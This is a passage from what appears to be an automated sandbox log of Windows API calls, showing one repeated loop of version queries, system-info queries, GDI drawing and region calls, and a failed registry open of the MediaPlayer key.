dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.327] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.327] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.327] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.327] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.327] BeginPath (hdc=0x0) returned 0 [0088.327] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.327] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.327] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.327] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.327] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.327] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.327] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.327] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.327] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x800401d3 [0088.327] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e0401d6 [0088.327] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041503 [0088.327] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041504 [0088.327] CombineRgn (hrgnDst=0x1041503, hrgnSrc1=0x800401d3, hrgnSrc2=0x7e0401d6, iMode=1) returned 1 [0088.327] CombineRgn (hrgnDst=0x1041504, hrgnSrc1=0x800401d3, hrgnSrc2=0x7e0401d6, iMode=4) returned 2 [0088.327] CreateSolidBrush (color=0xff) returned 0x2101502 [0088.327] CreateSolidBrush (color=0xff0000) returned 0x1101505 [0088.327] DeleteObject (ho=0x1101505) returned 1 [0088.327] DeleteObject (ho=0x7e0401d6) returned 1 [0088.327] DeleteObject (ho=0x800401d3) returned 1 [0088.327] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.327] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.327] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.328] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.328] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.328] BeginPath (hdc=0x0) returned 0 [0088.328] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.328] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.328] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.328] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.328] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.328] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f0401d6 [0088.328] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x810401d3 [0088.328] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041506 [0088.328] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041507 [0088.328] CombineRgn (hrgnDst=0x1041506, hrgnSrc1=0x7f0401d6, hrgnSrc2=0x810401d3, iMode=1) returned 1 [0088.328] CombineRgn (hrgnDst=0x1041507, hrgnSrc1=0x7f0401d6, hrgnSrc2=0x810401d3, iMode=4) returned 2 [0088.328] CreateSolidBrush (color=0xff) returned 0x2101505 [0088.328] CreateSolidBrush (color=0xff0000) returned 0x1101508 [0088.328] DeleteObject (ho=0x1101508) returned 1 [0088.328] DeleteObject (ho=0x810401d3) returned 1 [0088.328] DeleteObject (ho=0x7f0401d6) returned 1 [0088.328] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.328] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.328] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.328] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.328] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.328] BeginPath (hdc=0x0) returned 0 [0088.328] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.328] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.328] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.328] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.328] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.329] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.329] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.329] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x820401d3 [0088.329] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x800401d6 [0088.329] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041509 [0088.329] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104150a [0088.329] CombineRgn (hrgnDst=0x1041509, hrgnSrc1=0x820401d3, hrgnSrc2=0x800401d6, iMode=1) returned 1 [0088.329] CombineRgn (hrgnDst=0x104150a, hrgnSrc1=0x820401d3, hrgnSrc2=0x800401d6, iMode=4) returned 2 [0088.329] CreateSolidBrush (color=0xff) returned 0x2101508 [0088.329] CreateSolidBrush (color=0xff0000) returned 0x110150b [0088.329] DeleteObject (ho=0x110150b) returned 1 [0088.329] DeleteObject (ho=0x800401d6) returned 1 [0088.329] DeleteObject (ho=0x820401d3) returned 1 [0088.329] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.329] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.329] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.329] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.329] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.329] BeginPath (hdc=0x0) returned 0 [0088.329] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.329] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.329] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.329] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.329] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.329] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.329] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.329] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.330] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x810401d6 [0088.330] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x830401d3 [0088.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104150c [0088.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104150d [0088.330] CombineRgn (hrgnDst=0x104150c, hrgnSrc1=0x810401d6, hrgnSrc2=0x830401d3, iMode=1) returned 1 [0088.330] CombineRgn (hrgnDst=0x104150d, hrgnSrc1=0x810401d6, hrgnSrc2=0x830401d3, iMode=4) returned 2 [0088.330] CreateSolidBrush (color=0xff) returned 0x210150b [0088.330] CreateSolidBrush (color=0xff0000) returned 0x110150e [0088.330] DeleteObject (ho=0x110150e) returned 1 [0088.330] DeleteObject (ho=0x830401d3) returned 1 [0088.330] DeleteObject (ho=0x810401d6) returned 1 [0088.330] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.330] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.330] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.330] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.330] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.330] BeginPath (hdc=0x0) returned 0 [0088.330] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.330] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.330] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.330] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.330] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.330] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.330] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.330] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.330] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x840401d3 [0088.330] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x820401d6 [0088.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104150f [0088.330] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041510 [0088.330] CombineRgn (hrgnDst=0x104150f, hrgnSrc1=0x840401d3, hrgnSrc2=0x820401d6, iMode=1) returned 1 [0088.330] CombineRgn (hrgnDst=0x1041510, hrgnSrc1=0x840401d3, hrgnSrc2=0x820401d6, iMode=4) returned 2 [0088.331] CreateSolidBrush (color=0xff) returned 0x210150e [0088.331] CreateSolidBrush (color=0xff0000) returned 0x1101511 [0088.331] DeleteObject (ho=0x1101511) returned 1 [0088.331] DeleteObject (ho=0x820401d6) returned 1 [0088.331] DeleteObject (ho=0x840401d3) returned 1 [0088.331] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.331] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.331] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.331] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.331] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.331] BeginPath (hdc=0x0) returned 0 [0088.331] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.331] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.331] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.331] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.331] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.331] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.331] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.331] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.331] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x830401d6 [0088.331] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x850401d3 [0088.331] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041512 [0088.331] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041513 [0088.331] CombineRgn (hrgnDst=0x1041512, hrgnSrc1=0x830401d6, hrgnSrc2=0x850401d3, iMode=1) returned 1 [0088.331] CombineRgn (hrgnDst=0x1041513, hrgnSrc1=0x830401d6, hrgnSrc2=0x850401d3, iMode=4) returned 2 [0088.331] CreateSolidBrush (color=0xff) returned 0x2101511 [0088.331] CreateSolidBrush (color=0xff0000) returned 0x1101514 [0088.331] DeleteObject (ho=0x1101514) returned 1 [0088.331] DeleteObject (ho=0x850401d3) returned 1 [0088.331] DeleteObject (ho=0x830401d6) returned 1 [0088.331] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.331] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.332] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.332] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.332] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.332] BeginPath (hdc=0x0) returned 0 [0088.332] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.332] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.332] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.332] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.332] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.332] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.332] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.332] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.332] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x860401d3 [0088.332] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x840401d6 [0088.332] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041515 [0088.332] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041516 [0088.332] CombineRgn (hrgnDst=0x1041515, hrgnSrc1=0x860401d3, hrgnSrc2=0x840401d6, iMode=1) returned 1 [0088.332] CombineRgn (hrgnDst=0x1041516, hrgnSrc1=0x860401d3, hrgnSrc2=0x840401d6, iMode=4) returned 2 [0088.332] CreateSolidBrush (color=0xff) returned 0x2101514 [0088.332] CreateSolidBrush (color=0xff0000) returned 0x1101517 [0088.332] DeleteObject (ho=0x1101517) returned 1 [0088.332] DeleteObject (ho=0x840401d6) returned 1 [0088.332] DeleteObject (ho=0x860401d3) returned 1 [0088.332] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.332] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.332] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.332] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.332] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.332] BeginPath (hdc=0x0) returned 0 [0088.332] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.333] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.333] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.333] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.333] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.333] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x850401d6 [0088.333] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x870401d3 [0088.333] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041518 [0088.333] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041519 [0088.333] CombineRgn (hrgnDst=0x1041518, hrgnSrc1=0x850401d6, hrgnSrc2=0x870401d3, iMode=1) returned 1 [0088.333] CombineRgn (hrgnDst=0x1041519, hrgnSrc1=0x850401d6, hrgnSrc2=0x870401d3, iMode=4) returned 2 [0088.333] CreateSolidBrush (color=0xff) returned 0x2101517 [0088.333] CreateSolidBrush (color=0xff0000) returned 0x110151a [0088.333] DeleteObject (ho=0x110151a) returned 1 [0088.333] DeleteObject (ho=0x870401d3) returned 1 [0088.333] DeleteObject (ho=0x850401d6) returned 1 [0088.333] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.333] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.333] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.333] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.333] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.333] BeginPath (hdc=0x0) returned 0 [0088.333] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.333] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.333] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.333] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.333] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.333] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.334] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x880401d3 [0088.334] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x860401d6 [0088.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104151b [0088.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104151c [0088.334] CombineRgn (hrgnDst=0x104151b, hrgnSrc1=0x880401d3, hrgnSrc2=0x860401d6, iMode=1) returned 1 [0088.334] CombineRgn (hrgnDst=0x104151c, hrgnSrc1=0x880401d3, hrgnSrc2=0x860401d6, iMode=4) returned 2 [0088.334] CreateSolidBrush (color=0xff) returned 0x210151a [0088.334] CreateSolidBrush (color=0xff0000) returned 0x110151d [0088.334] DeleteObject (ho=0x110151d) returned 1 [0088.334] DeleteObject (ho=0x860401d6) returned 1 [0088.334] DeleteObject (ho=0x880401d3) returned 1 [0088.334] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.334] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.334] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.334] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.334] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.334] BeginPath (hdc=0x0) returned 0 [0088.334] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.334] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.334] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: 